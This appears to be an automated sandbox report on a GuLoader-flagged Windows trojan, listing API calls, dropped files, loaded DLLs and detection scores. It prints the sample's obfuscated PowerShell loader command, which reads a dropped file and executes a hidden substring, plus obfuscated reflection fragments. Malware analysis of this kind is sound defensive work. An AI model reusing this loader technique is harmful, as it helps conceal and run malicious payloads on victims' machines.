Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50024 version: TLS 1.2

Source: C:\Users\user\Desktop\ro7eoySJ9q.exe

Code function: 0_2_00405139 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405139

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\ro7eoySJ9q.exe

Jump to dropped file

Source: C:\Users\user\Desktop\ro7eoySJ9q.exe

Code function: 0_2_004031DD EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_004031DD

Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Code function: 0_2_00404976		0_2_00404976
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Code function: 0_2_004064EC		0_2_004064EC

Source: ro7eoySJ9q.exe

Static PE information: invalid certificate

Source: ro7eoySJ9q.exe, 00000000.00000000.2146223580.0000000000475000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenamehampert.exeDVarFileInfo$ vs ro7eoySJ9q.exe

Source: ro7eoySJ9q.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal96.troj.evad.winEXE@6/15@2/2

Source: C:\Users\user\Desktop\ro7eoySJ9q.exe

Code function: 0_2_00404430 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404430

Source: C:\Users\user\Desktop\ro7eoySJ9q.exe

Code function: 0_2_0040206A CoCreateInstance,

0_2_0040206A

Source: C:\Users\user\Desktop\ro7eoySJ9q.exe

File created: C:\Users\user\AppData\Roaming\Polysulfonate

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL

Source: C:\Users\user\Desktop\ro7eoySJ9q.exe

File created: C:\Users\user\AppData\Local\Temp\nso61FE.tmp

Jump to behavior

Source: ro7eoySJ9q.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\ro7eoySJ9q.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ro7eoySJ9q.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ro7eoySJ9q.exe	ReversingLabs: Detection: 60%
Source: ro7eoySJ9q.exe	Virustotal: Detection: 72%

Source: C:\Users\user\Desktop\ro7eoySJ9q.exe

File read: C:\Users\user\Desktop\ro7eoySJ9q.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ro7eoySJ9q.exe "C:\Users\user\Desktop\ro7eoySJ9q.exe"
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmophobia.SubString(72360,3);.$Referendumets($Aichmophobia)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmophobia.SubString(72360,3);.$Referendumets($Aichmophobia)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\ro7eoySJ9q.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ro7eoySJ9q.exe

Static file information: File size 1060792 > 1048576

Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.2825974414.0000000008771000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdbr source: powershell.exe, 00000002.00000002.2825974414.0000000008757000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \System.Core.pdbi$S source: powershell.exe, 00000002.00000002.2825974414.0000000008771000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000002.00000002.2832325462.000000000A25B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3416961233.0000000004BFB000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Udstyrsforretningerne $Reheeling218rnevold20 $Rettergangens), (Dagafsnit @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Bfsandwichs = [AppDomain]::Current
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Thyboer)), $Pippede).DefineDynamicModule($Slutvrdiernes, $false).DefineType($Ges, $Unpolishedness, [System.MulticastDelegate])$Projekt

Source: C:\Users\user\Desktop\ro7eoySJ9q.exe

Code function: 0_2_004060B0 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004060B0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04E7A5AF push eax; iretd	2_2_04E7A639
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04E7E9F9 push eax; mov dword ptr [esp], edx	2_2_04E7EA0C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07810FC4 push es; iretd	2_2_07810FC7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0781AB44 push 8B6B8DC5h; iretd	2_2_0781AB49

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\ro7eoySJ9q.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
